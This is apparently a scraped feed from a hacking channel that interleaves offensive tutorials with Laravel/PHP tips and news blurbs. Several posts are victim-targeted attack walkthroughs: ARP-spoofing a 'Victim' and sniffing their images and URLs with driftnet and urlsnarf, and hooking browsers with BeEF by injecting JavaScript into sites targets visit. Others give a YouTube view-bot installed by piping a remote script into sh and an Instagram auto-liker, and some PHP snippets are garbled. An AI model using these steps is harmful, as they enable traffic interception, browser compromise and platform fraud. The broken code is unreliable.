▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FULL MITM IN ANY DEBIAN BASE OS (KLAI/PARROT)

The method we’re going to use will employ Kali Linux, so it’ll help to have a certain degree of familiarity with Kali before we start.


1) To start with our attacks, the following are crucial prerequisites:

the network interface installed on our machine

and the IP of the WiFi router that our Victim uses.

View the network interface configuration
Run the following command in the terminal to find out the name of the network interface that you’re using:

$ sudo ifconfig


2) You will be displayed a long list of network interfaces, out of which you have to choose one and note it down somewhere.

As for the IP of the Router you’re using, use:

$ ip route show
On the terminal and you will be shown the IP of your network router. Now to do further processes, I have logged in to kali root mode.

STEP 1:Obtain the IP configuration from the Victim
Next up, you need to get the IP of your Victim’s Router. This is easy, and there are several different ways you can find it out. For instance, you can use a Network Monitoring Software Tool, or you can download a routers user interface program that lets you list all the devices and their IPs on a particular network.



STEP 2:Turn on the packet forwarding in Linux
This is very important because if your machine isn’t exchanging packets, the attack will result in a failure as your internet connection will be disrupted. By enabling the packet forwarding, you disguise your local machine to act as the network router.

To turn on packet forwarding, run the following command in a new terminal:

$ sysctl -w net.ipv4.ip_forward=1


STEP 3: Redirect packages to your machine with arpspoof
Arpspoof is a preinstalled Kali Linux utility that lets you expropriate traffic to a machine of your choice from a switched LAN. This is why Arpspoof serves as the most accurate way to redirect traffic, practically letting you sniff traffic on the local network.

Use the following syntax to start intercepting packages from the Victim to your Router:

$ arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP]


This has only enabled the monitoring the incoming packets from the Victim to the Router. Do not close the terminal just yet as it’ll stop the attack.

STEP 4: Intercept packages from the Router
You’re doing here the same as the previous step, except it’s just reversed. Leaving the previous terminal open as it is, opens up a new terminal to start extracting packages from the Router. Type the following command with your network interface name and router IP:

$ arpspoof -i [Network Interface Name] -t [Router IP] [Victim IP]


You’re probably realizing at this point that we’ve switched the position of the arguments in the command we used in the previous step.

Up till now, you’ve infiltrated to the connection between your Victim and the Router

STEP 5: Sniffing images from the target’s browser history
Let’s see what websites our target like to visit often and what images do they see there. We can achieve this using specialized software called driftnet.

Driftnet is a program that lets us monitor the network traffic from certain IPs and discern images from TCP streams in use. The program can display the images in JPEG, GIF, and other image formats.

To see what images are being seen on the target machine, use the following command

$ driftnet -i [Network Interface Name]


STEP 6: Sniffing URLs information from victim navigation
You can also sniff out the website’s URL that our Victim often visits. The program we’re going to use is a command-line tool known as urlsnarf. It sniffs out and saves the HTTPs request from a designated IP in the Common log format. Fantastic utility to perform offline post-processing traffic analysis with other network forensics tools.

The syntax you’ll put in the command terminal to sniff out the URLs is:

$ urlsnarf -i [Network interface name]


As long as each terminal is functional and you’ve accidentally not closed one of them, things should’ve gone smoothly for you so far.

Stopping the attack
Once you’re satisfied with what you’ve got your hands on, you may stop the attack by closing each terminal. You can use the ctrl+C shortcut to go about it quickly.

And don’t forget to disable packet forwarding that you had enabled to carry out the attack. Type in the following command in the terminal:

$ sysctl -w net.ipv4.ip_forward=0


enjoy❤️👍🏻
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁'

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to Install Google Hangouts on Ubuntu:
Install YakYak on Ubuntu
For Ubuntu, there are a few options available to install yakyak. Yakyak officially offers a DEB package for Debian/Ubuntu and derivatives. It’s also available as a snap package from Snapcraft. If you’re interested, it’s also possible to manually download and run yakyak without any installation.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) Yakyak DEB package
Grab the latest yakyak DEB package.

Let’s install the DEB package using APT. Launch the terminal and run the following command.

$ sudo apt update


$sudo apt install ./yakyak-1.5.9-linux-amd64.deb


2) Yakyak snap package
Snaps are universal Linux packages that can be installed on any Linux distro. All it needs is snappy (snap package manager) configured. Ubuntu comes with snap pre-installed. However, if you don’t have it installed, install it right away!

$ sudo apt update && sudo apt install snapd

3) Let’s make sure that snappy is ready to work. Install the “core” snap and restart the service.

$ sudo snap install core
$ sudo systemctl restart snapd

4) Finally, install yakyak snap.

$ sudo snap install yakyak


Yakyak manual run
This is not the recommended method of using yakyak in the long run. If a new version is released, you have to repeat this entire procedure manually again.

5) Download yakyak compressed package from GitHub
https://github.com/yakyak/yakyak

Extract the package.

$ tar -xvf yakyak-1.5.9-linux-x64.tar.gz


6) Mark the yakyak executable file.

$ chmod +x yakyak


7) Launch the app by running the command.

$ ./yakyak

✅verified
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Google quantum computing on the cover of "Science" quantum simulation of chemical reactions
#technologies

email hacking // use for learn !

On the morning of 28 August, the share price of Xiaomi Group increased by more than 10.7 percent at 23.65
#international

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HACK WITH BEEF KALI-PARROT

1) The BeEF Framework
A Linux OS such as Kali Linux, Parrot OS, BlackArch, Backbox, or Cyborg OS is required to install BeEF on your local machine.

Although BeEF comes pre-installed in various pen-testing operating systems, it might be possible that it is not installed in your case. To check if whether BeEF is installed, look for BeEF in your Kali Linux directory. To do so, go to applications>Kali Linux>System Services>beef start.

2) Alternatively, you can fire up BeEF from a new terminal emulator by entering the following code:

$ cd /usr/share/beef-xss
$ cd ./beef

3) To install BeEF on your Kali Linux machine, open the command interface and type in the following command:

$ sudo apt-get update
$ sudo apt-get install beef-xss

4) BeEF should now be installed under /usr/share/beef-xss.

You can start using BeEF using the address described previously in this section.

» Welcome to BeEF

5) Now, you can see the BeEF GUI in its full glory. Access the BeEF server by launching your web browser and looking up the localhost (127.0.0.1).

6) You can access the BeEF web GUI by typing the following URL in your web browser:

http://localhost:3000/ui/authentication


7) The default user credentials, both the username and password, are “beef:”

$ beef-xss-1
$ BeEF Login Web GUI


8) Now that you have logged into the BeEF web GUI, proceed to the “Hooked Browsers” section. Online Browsers and Offline Browsers. This section shows the victim’s hooked status.

Using BeEF
This walkthrough will demonstrate how to use BeEF in your local network using the localhost.

9) For the connections to be made outside the network, we will need to open ports and forward them to the users waiting to connect. In this article, we will stick to our home network. We will discuss port forwarding in future articles.

10) Hooking a Browser
To get to the core of what BeEF is about, first, you will need to understand what a BeEF hook is. It is a JavaScript file, used to latch on to a target’s browser to exploit it while acting as a C&C between it and the attacker. This is what is meant by a “hook” in the context of using BeEF. Once a web browser is hooked by BeEF, you can proceed to inject further payloads and begin with post-exploitation.

To find your local IP address, you open a new terminal and enter the following:

$ sudo ifconfig
Follow the steps below to perform the attack:

11) To target a web browser, you will first need to identify a webpage that the victim to-be likes to visit often, and then attach a BeEF hook to it.
Deliver a javascript payload, preferably by including the javascript hook into the web page’s header. The target browser will become hooked once they visit this site.
If you have been able to follow these steps without any problems, you should be able to see the hooked IP address and OS platform in the BeEF GUI. You can find out more about the compromised system by clicking on the hooked browser listed in the window.

Also, there are several generic webpage templates they have made available for your use.

http://localhost:3000/demos/butcher/index.html

Powered by wiki
✅verified
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#fasttips Changing Your Authentication Model :

» > Problem
You need the change the authentication model from the default User.

Your application is using namespaces or you want to use a differently named model for users.

» > Solution
Edit app/config/auth.php to change the model.

'model' => 'MyApp\Models\User',
Discussion
Don’t forget the required interfaces.

🦑If you’re using your own model it’s important that your model implements Auth’s UserInterface. If you’re implementing the password reminder feature it should also implement RemindableInterface.

<?php namespace MyApp\Models;

use Illuminate\Auth\UserInterface;
use Illuminate\Auth\Reminders\RemindableInterface;

class User extends \Eloquent implements UserInterface, RemindableInterface
{
...
}


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Why should a "supermarket" buy TikTok, why should the old brand also do social e-commerce #international

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Methode 2020 for Get Instagram posts/profile/hashtag data without using Instagram API. crawler.py
Like posts automatically. liker.py

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) Make sure you have Chrome browser installed.

2) Download chromedriver and put it into bin folder: ./inscrawler/bin/chromedriver
> https://sites.google.com/a/chromium.org/chromedriver/

3) Install Selenium: pip3 install -r requirements.txt

4) cp inscrawler/secret.py.dist inscrawler/secret.py

E X A M P L E S :

python crawler.py posts_full -u cal_foodie -n 100 -o ./output
python crawler.py posts_full -u cal_foodie -n 10 --fetch_likers --fetch_likes_plays
python crawler.py posts_full -u cal_foodie -n 10 --fetch_comments
python crawler.py profile -u cal_foodie -o ./output
python crawler.py hashtag -t taiwan -o ./output
python crawler.py hashtag -t taiwan -o ./output --fetch_details
python crawler.py posts -u cal_foodie -n 100 -o ./output # deprecated

🦑 MORE USAGE :


1) Choose mode posts, you will get url, caption, first photo for each post; choose mode posts_full, you will get url, caption, all photos, time, comments, number of likes and views for each posts. Mode posts_full will take way longer than mode posts. [posts is deprecated.

2) For the recent posts, there is no quick way to get the post caption]

3) Return default 100 hashtag posts(mode: hashtag) and all user's posts(mode: posts) if not specifying the number of post -n, --number.

4) Print the result to the console if not specifying the output path of post -o, --output.

5) It takes much longer to get data if the post number is over about 1000 since Instagram has set up the rate limit for data request.

6) Don't use this repo crawler Instagram if the user has more than 10000 posts.

enjoy❤️👍🏻
✅git 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

The US 5G network speed lags behind the world: the average downlink is only 50.9Mb/s
#technologie

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑youtube-bot topic 2020 :
(views)

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

Run following commands in the terminal:
1) curl -fs https://gitlab.com/DeBos/mpt/raw/master/mpt.sh

> sh -s install "git python"

2) git clone https://gitlab.com/DeBos/ytviewer.git

3) cd ytviewer

4) make

then
Run following command in the command prompt or the terminal:

5) python main.py [-h] [-u URL|FILE] [-p N] [-B firefox|chrome] [-P FILE] [-R REFERER|FILE] [-U USER_AGENT|FILE

for more usage visit https://github.com/DeBos99/ytviewer#usage

enjoy❤️👍🏻
✅git 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Fasttips Finding Files Matching a Pattern :


Use the File::glob() method.

$log_files = File::glob('/test/*.log');
if ($log_files === false)
{
die("An error occurred.");
}
You can also pass flags to the method.

$dir_list = File::glob('/test/*', GLOB_ONLYDIR);
if ($dir_files === false)
{
die("An error occurred.");
}
Valid flags are:

GLOB_MARK – Adds a slash to each directory returned
GLOB_NOSORT – Return files as they appear in the directory (no sorting)
GLOB_NOCHECK – Return the search pattern if no files matching it were found
GLOB_NOESCAPE – Backslashes do not quote meta-characters
GLOB_BRACE – Expands {a,b,c} to match ‘a’, ‘b’, or ‘c’
GLOB_ONLYDIR – Return only directory entries which match the pattern
GLOB_ERR – Stop on read errors (like unreadable directories), by default errors are ignored.
Returns an empty array if no files are matched or a false on error.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Crawl and analyze a fileCrawl and analyze a file :

crawl and analyze a file is very simple. This tutorial will lead you step by step to implement it through an example. let's start!


1) First of all, we must first decide the URL address we will crawl. It can be set in the script or passed through $QUERY_STRING. For simplicity, let's set the variables directly in the script.

<?
$url = 'http://www.php.net' ;
?> In the

second step, we grab the specified file and store it in an array through the file() function.

<?
$url = 'http :
//www.php.net ' ; $lines_array = file ( $url );
?>


2) Okay, now there are files in the array. However, the text we want to analyze may not be all on one line. To understand this file, we can simply convert the array $lines_array into a string. We can use the implode(x,y) function to achieve it. If you want to use explode (array of string variables) later, it may be better to set x to "|" or "!" or other similar separators. But for our purposes, it is best to set x to a space. y is another necessary parameter because it is the array you want to process with implode().

<?
$url = 'http:;
$lines_array = file ( $url );
$lines_string = implode ( '' , $lines_array );
?>


3) Now, the crawling work is finished, and it’s time to analyze it. For the purpose of this example, we want to get everything between <head> and </head>. In order to analyze the string, we also need something called a regular expression.

<?
$url = 'http :
//www.php.net ' ; $lines_array = file ( $url );
$lines_string = implode ( '' , $lines_array );
eregi ( "<head>(.*)</ head>" , $lines_string ,$head );
?>


4) Let's take a look at the code. As you can see, the eregi() function is executed in the following format:

eregi("<head>(.*)</head>", $lines_string, $head);

"(.*)" means everything and can be explained For, "Analyze everything between <head> and </head>". $lines_string is the string we are analyzing, and $head is the array where the analysis result is stored.

5) Finally, we can input data. Because there is only one instance between <head> and </head>, we can safely assume that there is only one element in the array, and it is what we want. Let's print it out.

<?
$url = 'http :
//www.php.net ' ; $lines_array = file ( $url );
$lines_string = implode ( '' , $lines_array );
eregi ( "<head>(.*)</ head>" ,);
echo $head [ 0 ];
?>

6) This is all the code.
<?php
$url = 'http :
//www.php.net ' ; $lines_array = file ( $url );
$lines_string = implode ( '' , $lines_array );
preg_match_all ( "/<body([^>] .+?)>(.*)<\/body>/is" , $lines_string , $m );
echo "<xmp>" ;
echo $m [ 2 ][ 0 ];
?>

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

The resulting script could only be described as a quick hack, about ten lines of PowerShell to read a text le and iterate over each line, running the required nmap command and checking to make sure that the XML le actually saved.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FULL AIRMON-NG TUTORIAL :
(KALI-PARROT-UBUNTU...)

 wireless cards to turn on monitor mode:
For this purpose, we will use the POSIX sh script specifically designed to carry out this function:

$ sudo airmon-ng --help
$usage: airmon-ng <start|stop|check> <interface> [channel or frequency]

See the interface’s status
To view the interface’s status, type the following command into the terminal:

$ sudo airmon-ng


Kill background processes
Use the following syntax to check if any program is running in the background

$ sudo airmon-ng check


You can also terminate any process that you think is interfering with airmon_ng or taking up memory using:

$ sudo airmon-ng check kill


How to enable Monitor Mode using Airmon-ng
If you have tried enabling monitor mode by using iw and failed, then the good idea is to try to enable monitor mode by using a different method.

The first step is to get the information about your wireless interface

$ sudo airmon-ng


Of course, you would like to kill any process that can interfere with using the adapter in monitor mode. To do that, you can use a program called airmon-ng or else use the following command.

$ sudo airmon-ng check


$ sudo airmon-ng check kill


Now we can enable the Monitor Mode without any interference.

$ sudo airmon-ng start wlan0


Wlan0mon is created.

$ sudo iwconfig


Now, you can use the following commands to disable the monitor mode and return to the managed mode.

$ sudo airmon-ng stop wlan0mon
Follow the command to restart the network manager.

$ sudo systemctl start NetworkManager
How to turn off the NetworkManager that prevents Monitor Mode
$ sudo systemctl stop NetworkManager

enjoy❤️👍🏻
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#requested How to Add a New Column to Existing Table in a Migration ?

I've had problems I couldn't connect a new section to my users list. Can't seem to understand it.

I tried to edit the migration file using…

<?php
public function up()
{
Schema::create('users', function ($table) {
$table->integer("paid");
});
}
In terminal, I execute php artisan migrate:install and migrate.

🦑How do I add new columns?

Solution :

You cannot update any migrations that have been migrated already. If it is added to the migrations table already, it wont process it again. Your solution is to create a new migration, for which you may use the migrate:make command on the Artisan CLI. Use a specific name to avoid clashing with existing models

1) for Laravel 5+:

php artisan make:migration addpaidtouserstable --table=users
You will be using the Schema::table() method (since you’re accessing the existing table, and not creating a new one). And you can add a column like this:

public function up()
{
Schema::table('users', function($table) {
$table->integer('paid');
});
}

2) and don’t forget to add the rollback option:

public function down()
{
Schema::table('users', function($table) {
$table->dropColumn('paid');
});
}

3) Then you can run your migrations:

> php artisan migrate

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁